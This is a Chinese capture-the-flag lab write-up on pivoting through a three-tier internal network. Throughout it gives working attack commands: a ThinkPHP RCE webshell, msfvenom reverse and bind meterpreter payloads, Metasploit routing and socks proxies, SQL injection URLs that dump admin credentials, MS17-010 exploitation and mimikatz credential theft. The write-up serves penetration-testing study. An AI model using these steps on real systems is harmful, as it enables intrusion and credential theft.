隧道穿透与端口转发

什么是隧道?
在渗透测试中,进入内网后,我们要判断流量是否能够出的去、进的来。
在实际的网络情况下,流量会经过很多的边界设备,在一般的企业内网中,可能会存在 IDP、IPS、防火墙等设备,如果异常的话,就会直接将通信阻断;这里我们说的隧道,就是绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方通信。当被封装的数据包达到了另外的地址的时候,解包还原,并将还原后的数据包发送到相应的服务器上。

常见的隧道包括三个大类:网络层、应用层、传输层

这里则是通过cfs靶场来学习一下隧道穿透漫游

CFS-模拟大赛

来源2019某CTF线下赛真题内网结合WEB攻防题库,涉及WEB攻击,内网代理路由等技术,每台服务器存在一个Flag,获取每一个Flag对应一个积分,获取三个Flag结尾。

前提配置:
下面利用ifconfig来配置网卡的IP地址,当然这个地址是临时的地址,一旦重启网络服务或者重启网络系统就会失效的!!
格式:ifconfig ethx IP/MASK:配置某个网卡的ip地址
例如:设置eth0的IP地址为x.x.x.x,则就可以在命令行下直接键入:ifconfig eth0 192.168.22.22/24

虚拟机上创建vlan分配ip地址

注:我这里Target1地址是192.168.3.117,Target2地址是192.168.22.102
Target1上需要配置宝塔 账号eaj3yhsl 密码41bb8fee
1.这里得添加Target1的ip地址

Target2上需要配置宝塔 账号xdynr37d 密码123qwe..
1.这里得添加Target2的IP地址

Target1:

探针目标-利用WEB漏洞(TP5_RCE)-获取webshell权限-获取Flag-Target2
前期信息搜集:
1.先利用kali自带的dirb来扫描网站目录,发现robots.txt找到一个flag

2.之后在访问Index.php 会发现网站是一个thinkphp框架

3.大胆的猜测一下这个网站有没有可能存在ThinkPHP5.x远程连接命令执行漏洞,一测试发现还真有直接命令执行上马

4.首先整出这个网站的绝对路径,这是方便写一句话木马

pwd
echo '<?php eval($_POST['x']);?>' > /www/wwwroot/ThinkPHP/pu
4.1此时发现大马已经存在,直接菜刀连接大马

5.名为x.php密码为x的大马兄弟以上线

kali开启msf:

1.利用菜刀将生成后门放到Target1的主机上:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=kali本机地址 LPORT=1111 -f elf >t1.elf

2.kali上的msf设置监听模块以此来接收反弹:

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST kali本机地址
set LPORT 1111
exploit
background

3.利用菜刀的虚拟终端运行木马
上传成功之后,运行木马,如果权限不够

chmod +777 t1.elf           增加权限
t1.elf                      执行木马

4.kali上接收到msf反弹

5.之后在上msf上添加22网段的路由

获取网络接口:run get_local_subnets
查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.22.0/24

6.如果我们liunx没有对target利用特别好的工具,我们想用外网windows的工具就开启socks代理
开启本地代理:

kali  msf运行下面命令
use auxiliary/server/socks_proxy
set srvport 1080
exploit

7.在windows上创建sock代理

8.设置msf创建的端口

9.测试联通性

10.然后在选择要代理的exe ,这里是选择软件所在的目录选择软件

11.由于我们要利用kali上面的工具,所以这里就要设置kali的代理,配置kali的proxychains4.conf,然后在最底下添加msf开启的socks5 和ip端口

12.利用kali查找22网段的端口,最后会爆出22.102的网段80端口开启
其一:

proxychains nmap -sT -Pn 192.168.22.0/24 -p80
-Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护。
-sT:扫描TCP数据包已建立的连接connect

其二方法:
利用msf中自带的端口扫描

use auxiliary/scanner/portscan/tcp
set rhosts 192.168.22.0/24
set threads 100
run

Target2:

探针目标-利用WEB漏洞(SQL注入)-后台获取webshell权限-获取
信息收集:
1.我们通过nmap或者msf自带的端口扫描工具查找到192.168.22.102存在80端口也就是网页,之后再来访问网页来获取一些信息
2.没有见过的cms一般这里是直接扫网站目录,可以使用sockscap软件作为代理添加御剑或者别的扫描工具来扫描

3.扫描出他的后台,一般这里是测试登录框的注入点或者看源代码找接口未授权访问,这里都没有

4.他就比较狗,在主页里面的源代码中有一个提示

5.很明确的告诉我们这是个sql注入点
5.1 其一工具:这个时候就要请出我们的超级sql工具!!!!!!!

5.2 在工具上添加socks5的代理

5.3 再来注入右击直接空白处选择生成数据包

5.4 使用他自己的识别注入

5.5 然后依次来获取库 表 列  数据 获取到的数据是个md5加密,之后去MD5加解密的网站上解密密码是123qwe

6.其二手工注入:
6.1 '报错 "正常 很明显 字符型注入

6.2 就一直' order by 这样查有多列,会发现有到39无显示,到40有报错,就证明有39个表

%23是#的url编码过来的

6.3 在利用Union select 联合注入来找数据库,数据库名叫bagecms
![image.png](https://xzfile.aliyuncs.com/media/upload/picture/20220129185420-cfeae478-80f1-1.png)6.4 就是通常的sql注入手段获取bagecms之后的所有表名
```view-source:http://192.168.22.102/index.php?r=vul&keyword=1' union select group_concat(table_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from information_schema.tables where table_schema='bagecms' %23

6.5 再来查找bage_admin所有的列

view-source:http://192.168.22.102/index.php?r=vul&keyword=1' union select group_concat(column_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from information_schema.columns where table_name='bage_admin' %23

6.6 最后一步查找账号密码

view-source:http://192.168.22.102/index.php?r=vul&keyword=1' union select username,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from bagecms.bage_admin limit 0,1%23

7.账号密码有了,后面就是利用账号密码来进入后台找上传点写个马,显然下一步的时候都会有一个flag

8.到后台的时候看到有这个模板就发现可以修改默认文件,啊 就算你不知道修改,你非要找个上传点,就得找这个上传设置给搞一下添加php后缀

9.朴实的渗透,写个马进去

10.用sockscap软件添加一个caidao的代理,然后一连

11.不要问我为什么要加?r=tag 因为我们在修改index.php的时候 是在tag的文件夹下面修改的,这是一个小细节

12.然后就起飞了,拿到target主机二的web权限,这里就跟target1一样了 弄一个正向连接kali的大马子
往这上面一传一执行,msf一上线,添加33网段,在一扫描网络,找他的服务器、端口,利用漏洞,啪的一下拿下,恩姆思路太清晰了

这里解释一下为什么要整一个正向连接的后门,因为我们开始的3网段只有一个22网段的路由,没有33网段的路由,所以并不能连接到33网段的路由,记住此时我们已经拿到target2的web服务器,我们要将这个后门放到他的服务器上,执行这个后门来连接我们的msf,之后msf会反弹回targer2的权限,接下来就可以顺理成章的添加33网段路由

target3

1.生成正向后门:
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf

2.访问接受:
kali上运行
use exploit/multi/handler set payload linux/x64/meterpreter/bind_tcp bind正向连接 set rhost 192.168.22.102 set LPORT 3333 exploit

2.1 t2没有t1的3网段的地址,如果生成之前payload 绑定的3网段的木马 木马反向连接不上

所以这个时候需要生成正向连接后门 bind

2.2 上传这个后门,在执行

2.3 msf接收到之后就开始老生常谈添加路由

3.信息收集及配置访问
获取网络接口:run get_local_subnets 查看路由地址:run autoroute -p 添加路由地址:run autoroute -s 192.168.33.0/24

4.之后在添加一个socks的代理,然后换个端口,因为我们的msf添加了33网段,所以kali可以通过kali-》target1--》target2--》查找target3的ip和端口

use auxiliary/server/socks_proxy
set srvport 1081
run

4.1 之后再Kali上面添加一个ip

sudo vi /etc/proxychains4.conf

5.有了代理就可以探测存活主机了,发现了33.33一台存活主机
use auxiliary/scanner/portscan/tcp set rhosts 192.168.33.0/24 set threads 200 run

渗透target3主机:
探针目标-端口及漏洞扫描-利用MS17010获取系统权限-获取Flag-GG
1.在通过nmap来扫描33.33存在的端口
proxychains nmap -Pn -sT -T4192.168.33.33 kali上扫描

2.最后有445和3389端口,这明显就是win7的机子,大胆一点猜猜是否有永恒之蓝漏洞

3.测试33.33的机子上是否存在永恒之蓝漏洞(很明显存在漏洞)
use auxiliary/scanner/smb/smb_ms17_010 //判断漏洞 set rhosts 192.168.33.33 //设置ip地址 run

4.目标以确定开始攻击,啪的一下很快啊,就直接拿到system权限
use exploit/windows/smb/ms17_010_psexec //验证漏洞 set payload windows/meterpreter/bind_tcp //正向连接 set RHOSTS 192.168.33.33 //攻击目标 set RHOST 192.168.33.33 //连接目标 exploit

5.到了这一步剩下的思路就很清晰,提权然后获取账号密码连接远程桌面
getsystem //获得system权限 load mimikatz //导入mimikatz creds_all //获取全部信息

6.利用kali来远程登录win7主机

7.嗯,机子很香,下次不需在用了

总结:
这个靶场可以学习到如何一步步利用跳板代理横向到最深处网络。
Thinkphp5.x Rce漏洞利用,三种利用方式,以及echo写马的注意事项
MSF添加路由和socks代理,将Linux主机作为跳板从而横向移动
八哥CMS的漏洞利用Getshell,sql注入-->后台管理登陆,后台模板Getshell
Ms17-010的psexec利用模块的使用
典型的三层网络环境,通过利用MSF强大的路由功能,不断添加路由+socks代理,横向移动到最后一层网络
SocksCap64小红帽软件代理工具的使用

后记:本人初学内网安全,技术有些生疏,如果有错误的地方请各位大佬点播一下

内网安全-隧道穿透漫游相关推荐

  1. 【内网安全-隧道技术】SMB、ICMP、DNS隧道、SSH协议

    前言: 介绍: 博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章). 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edus ...

  2. 【内网安全-隧道搭建】内网穿透_Ngrok上线(美版、国版二开)

    目录 一.准备 1.意义: 2.项目: 二.内网穿透 1.简介: 三.Ngrok(入门上线) 1.简述: 2.Ngrok入门上线(国版二开) 3.相关工具: 2.Ngrok入门上线(美版) 一.准备 ...

  3. 【内网安全-隧道搭建】内网穿透_Frp上线、测试

    目录 Frp(简易上线) 1.简述: 2.工具: 3.使用: 1.准备: 2.服务端(公网): 2.客户端(内网): 3.测试方法: 4.生成后门木马监听: Frp(简易上线) 1.简述: 1)Frp ...

  4. 内网端口 转发 穿透 工具简介

    目录 一.LCX 1.lcx 内网端口转发(类似于SSH远程转发-R) 2.本地端口转发(类似于SSH本地转发-L) 二.nc反弹 正向连接 反向连接 三.socks代理工具 (1)Earthworm ...

  5. 内网安全-隧道技术-防火墙限制协议绕过-文件传输

    隧道技术: 一种通过使用互联网络基础设施在网络之间传递数据的方式,包括数据封装. 传输和解包在内的全过程.使用隧道传递的数据(或负载)可以是不同协议的数据帧或包. 封装: 隧道协议将这些其他协议的数据 ...

  6. qq 实现连接内网_如何穿透内网稳定进行远程桌面?花生壳盒子来搞定

    内网的电脑访问,一直都是一个比较麻烦的问题,虽然可以通过路由器来设置,但是对于很多用户来说,那繁琐的设置,简直就跟天书一样,劝退效果一流.笔者从事IT行业,内网穿透笔者有需求,笔者的很多客户也有这样的 ...

  7. 使用frp配置内网访问(穿透)教程(超详细,简单)

    1 Frp介绍 frp 是一个开源.简洁易用.高性能的内网穿透和反向代理软件,支持 tcp, udp, http, https等协议.frp 项目官网是 https://github.com/fate ...

  8. 腾讯云动态公网IP绑定域名实现内网服务器公网穿透

    公众号推广: 目前CSDN进行VIP可见,文章可在微信公众号进行免费的阅读. 文章内容经过认证实践,比较的清晰易懂,适合初次接触的人员. 请关注微信公众号:菜鸟编程踩坑之路,进入公众号搜索关键词 内网 ...

  9. 海康威视 + 搭配内网穿透,搭建远程视频监控教程

    一.注册网云穿帐号 1. 通过网云穿控制台进行帐号注册,控制台网址:i.xiaomy.net 注册成功后会免费赠送一个免费的二级域名(已备案) 2. 填写注册信息 二.搭建监控系统 内网搭建好监控系统 ...

  10. 内网穿透软件对比——cpolar : 网云穿(下)

    文章目录 1. 前言 2. 对比内容 2.1 TCP协议功能及操作对比 2.1.1 网云穿的TCP设置 2.1.2 cpolar的TCP设置 1.2 使用感受对比 3. 结语 1. 前言 发布本地网页 ...

最新文章

  1. 大型网站的灵魂——性能优化
  2. Ecplise中tomcat上运行HTML文件自动加载
  3. three.js 调用网络摄像头
  4. 1.1.3 以类为单位的编程思想
  5. 几种流行Webservice框架性能对比
  6. 【Android】Android 设置Activity窗体 不显示标题和全屏显示
  7. 20165223《Java程序设计》第八周Java学习总结
  8. 分享一些笔记本电脑日常保养技巧
  9. 技术干货 | 应用上线前的“体检”,你知道需要检测哪些指标吗?
  10. 苹果cmsV10仿哈哩哈哩动漫自适应模板
  11. laravel 关联关系之多态关联
  12. 自注意力机制_与SENet互补提升,华为诺亚提出自注意力新机制:Weight ExcitationECCV2020...
  13. python输出函数使用_python基本输入输出函数
  14. php mongo 范围查询语句,【MongoDB】数组和范围查询的相互作用
  15. python拼写错误20几分钟怎么办_Python | 21行轻松搞定拼写检查器
  16. pdn阻抗测试_Hyperlynx仿真PDN阻抗后仿真
  17. TEA(Tiny Encryption Algorithm)
  18. 机器学习:学习的分类
  19. 苹果屏幕镜像_苹果屏幕镜像一直在转,秒懂投屏帮你解决
  20. Xshell如何设置快捷复制、粘贴热键

热门文章

  1. linux打印系统cups原理分析
  2. VC2005编译安装QT
  3. Python进行停用词表去重
  4. java在线视频源码_java在线视频会议源代码
  5. Mac 上的 MySQL 管理工具 -- Sequel Pro
  6. warning CS0618: 'WWW' is obsolete: 'Use UnityWebRequest, a fully featured replacement which is more
  7. .mmap文件用什么软件可以打开?
  8. 计算机组成与体系结构概述
  9. Python入门——爬取pubmed文献做分析
  10. Ubuntu16.04安装(QQ.exe)